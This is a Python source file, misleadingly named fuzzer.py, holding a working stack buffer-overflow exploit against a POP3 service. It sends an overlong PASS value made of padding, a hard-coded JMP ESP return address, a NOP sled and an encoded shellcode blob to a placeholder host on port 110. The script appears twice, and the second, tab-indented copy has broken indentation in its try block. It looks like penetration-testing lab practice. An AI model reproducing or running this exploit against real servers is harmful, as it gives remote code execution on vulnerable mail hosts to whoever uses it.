digital-shokunin/fuzzer.py

## fuzzer.py
#!/usr/bin/python3
import socket
#Python 2 is dead/on borrowed time, write exploits in Python3 FTW

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#Replace shellcode with your own but prepend b" to hex strings
shellcode = (
    b"\xda\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xbd\xc6\xe9\x1f\xf7\xb1"
    b"\x52\x31\x6f\x17\x03\x6f\x17\x83\x29\x15\xfd\x02\x49\x0e\x80"
    b"\xed\xb1\xcf\xe5\x64\x54\xfe\x25\x12\x1d\x51\x96\x50\x73\x5e"
    b"\x5d\x34\x67\xd5\x13\x91\x88\x5e\x99\xc7\xa7\x5f\xb2\x34\xa6"
    b"\xe3\xc9\x68\x08\xdd\x01\x7d\x49\x1a\x7f\x8c\x1b\xf3\x0b\x23"
    b"\x8b\x70\x41\xf8\x20\xca\x47\x78\xd5\x9b\x66\xa9\x48\x97\x30"
    b"\x69\x6b\x74\x49\x20\x73\x99\x74\xfa\x08\x69\x02\xfd\xd8\xa3"
    b"\xeb\x52\x25\x0c\x1e\xaa\x62\xab\xc1\xd9\x9a\xcf\x7c\xda\x59"
    b"\xad\x5a\x6f\x79\x15\x28\xd7\xa5\xa7\xfd\x8e\x2e\xab\x4a\xc4"
    b"\x68\xa8\x4d\x09\x03\xd4\xc6\xac\xc3\x5c\x9c\x8a\xc7\x05\x46"
    b"\xb2\x5e\xe0\x29\xcb\x80\x4b\x95\x69\xcb\x66\xc2\x03\x96\xee"
    b"\x27\x2e\x28\xef\x2f\x39\x5b\xdd\xf0\x91\xf3\x6d\x78\x3c\x04"
    b"\x91\x53\xf8\x9a\x6c\x5c\xf9\xb3\xaa\x08\xa9\xab\x1b\x31\x22"
    b"\x2b\xa3\xe4\xe5\x7b\x0b\x57\x46\x2b\xeb\x07\x2e\x21\xe4\x78"
    b"\x4e\x4a\x2e\x11\xe5\xb1\xb9\x14\xf1\xb9\x7a\x41\x07\xb9\x7d"
    b"\x2a\x8e\x5f\x17\x5c\xc7\xc8\x80\xc5\x42\x82\x31\x09\x59\xef"
    b"\x72\x81\x6e\x10\x3c\x62\x1a\x02\xa9\x82\x51\x78\x7c\x9c\x4f"
    b"\x14\xe2\x0f\x14\xe4\x6d\x2c\x83\xb3\x3a\x82\xda\x51\xd7\xbd"
    b"\x74\x47\x2a\x5b\xbe\xc3\xf1\x98\x41\xca\x74\xa4\x65\xdc\x40"
    b"\x25\x22\x88\x1c\x70\xfc\x66\xdb\x2a\x4e\xd0\xb5\x81\x18\xb4"
    b"\x40\xea\x9a\xc2\x4c\x27\x6d\x2a\xfc\x9e\x28\x55\x31\x77\xbd"
    b"\x2e\x2f\xe7\x42\xe5\xeb\x17\x09\xa7\x5a\xb0\xd4\x32\xdf\xdd"
    b"\xe6\xe9\x1c\xd8\x64\x1b\xdd\x1f\x74\x6e\xd8\x64\x32\x83\x90"
    b"\xf5\xd7\xa3\x07\xf5\xfd" )

# 5F4A358F FFE4      JMP ESP
jmpespaddr = b'\x8f\x35\x4a\x5f'
prepad = bytes(("A" * 2606).encode())
nopsled = b'\x90' * 16 #accidentally sent \x60, because typo, and it still worked, weirdly enough.
padding = bytes(("C" * (3500 - 2606 - 4 - 16 - 351)).encode())
buffer = prepad + jmpespaddr + nopsled + shellcode + padding

try:
    print("\nSending not very nice buffer...")
    connect=s.connect(('10.10.10.10',110)) #Replace IP with pop3 server IP
    s.recv(1024)
    s.send(b'USER operator\r\n')
    s.recv(1024)
    s.send(b'PASS ' + buffer + b'\r\n')
    print("\nDone!")
    s.close()
except Exception as e:
    print("Could not connect to POP3")
    print(e)
	#!/usr/bin/python3
	import socket
	#Python 2 is dead/on borrowed time, write exploits in Python3 FTW

	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	#Replace shellcode with your own but prepend b" to hex strings
	shellcode = (
	b"\xda\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xbd\xc6\xe9\x1f\xf7\xb1"
	b"\x52\x31\x6f\x17\x03\x6f\x17\x83\x29\x15\xfd\x02\x49\x0e\x80"
	b"\xed\xb1\xcf\xe5\x64\x54\xfe\x25\x12\x1d\x51\x96\x50\x73\x5e"
	b"\x5d\x34\x67\xd5\x13\x91\x88\x5e\x99\xc7\xa7\x5f\xb2\x34\xa6"
	b"\xe3\xc9\x68\x08\xdd\x01\x7d\x49\x1a\x7f\x8c\x1b\xf3\x0b\x23"
	b"\x8b\x70\x41\xf8\x20\xca\x47\x78\xd5\x9b\x66\xa9\x48\x97\x30"
	b"\x69\x6b\x74\x49\x20\x73\x99\x74\xfa\x08\x69\x02\xfd\xd8\xa3"
	b"\xeb\x52\x25\x0c\x1e\xaa\x62\xab\xc1\xd9\x9a\xcf\x7c\xda\x59"
	b"\xad\x5a\x6f\x79\x15\x28\xd7\xa5\xa7\xfd\x8e\x2e\xab\x4a\xc4"
	b"\x68\xa8\x4d\x09\x03\xd4\xc6\xac\xc3\x5c\x9c\x8a\xc7\x05\x46"
	b"\xb2\x5e\xe0\x29\xcb\x80\x4b\x95\x69\xcb\x66\xc2\x03\x96\xee"
	b"\x27\x2e\x28\xef\x2f\x39\x5b\xdd\xf0\x91\xf3\x6d\x78\x3c\x04"
	b"\x91\x53\xf8\x9a\x6c\x5c\xf9\xb3\xaa\x08\xa9\xab\x1b\x31\x22"
	b"\x2b\xa3\xe4\xe5\x7b\x0b\x57\x46\x2b\xeb\x07\x2e\x21\xe4\x78"
	b"\x4e\x4a\x2e\x11\xe5\xb1\xb9\x14\xf1\xb9\x7a\x41\x07\xb9\x7d"
	b"\x2a\x8e\x5f\x17\x5c\xc7\xc8\x80\xc5\x42\x82\x31\x09\x59\xef"
	b"\x72\x81\x6e\x10\x3c\x62\x1a\x02\xa9\x82\x51\x78\x7c\x9c\x4f"
	b"\x14\xe2\x0f\x14\xe4\x6d\x2c\x83\xb3\x3a\x82\xda\x51\xd7\xbd"
	b"\x74\x47\x2a\x5b\xbe\xc3\xf1\x98\x41\xca\x74\xa4\x65\xdc\x40"
	b"\x25\x22\x88\x1c\x70\xfc\x66\xdb\x2a\x4e\xd0\xb5\x81\x18\xb4"
	b"\x40\xea\x9a\xc2\x4c\x27\x6d\x2a\xfc\x9e\x28\x55\x31\x77\xbd"
	b"\x2e\x2f\xe7\x42\xe5\xeb\x17\x09\xa7\x5a\xb0\xd4\x32\xdf\xdd"
	b"\xe6\xe9\x1c\xd8\x64\x1b\xdd\x1f\x74\x6e\xd8\x64\x32\x83\x90"
	b"\xf5\xd7\xa3\x07\xf5\xfd" )

	# 5F4A358F FFE4 JMP ESP
	jmpespaddr = b'\x8f\x35\x4a\x5f'
	prepad = bytes(("A" * 2606).encode())
	nopsled = b'\x90' * 16 #accidentally sent \x60, because typo, and it still worked, weirdly enough.
	padding = bytes(("C" * (3500 - 2606 - 4 - 16 - 351)).encode())
	buffer = prepad + jmpespaddr + nopsled + shellcode + padding

	try:
	print("\nSending not very nice buffer...")
	connect=s.connect(('10.10.10.10',110)) #Replace IP with pop3 server IP
	s.recv(1024)
	s.send(b'USER operator\r\n')
	s.recv(1024)
	s.send(b'PASS ' + buffer + b'\r\n')
	print("\nDone!")
	s.close()
	except Exception as e:
	print("Could not connect to POP3")
	print(e)